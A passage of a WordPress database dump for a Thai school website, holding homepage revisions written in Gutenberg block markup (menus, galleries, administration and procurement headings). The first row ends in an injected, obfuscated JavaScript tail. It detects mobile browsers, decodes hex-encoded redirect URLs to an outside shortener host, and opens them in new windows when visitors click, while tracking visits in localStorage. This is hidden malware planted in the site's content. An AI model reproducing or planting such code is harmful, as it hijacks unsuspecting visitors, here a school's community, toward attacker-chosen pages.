wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:50:05','2024-07-27 04:50:05','',14,'http://pakhaeng.ssk.in.th/?p=108',0,'revision','',0),
(109,1,'2024-07-27 11:51:06','2024-07-27 04:51:06','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 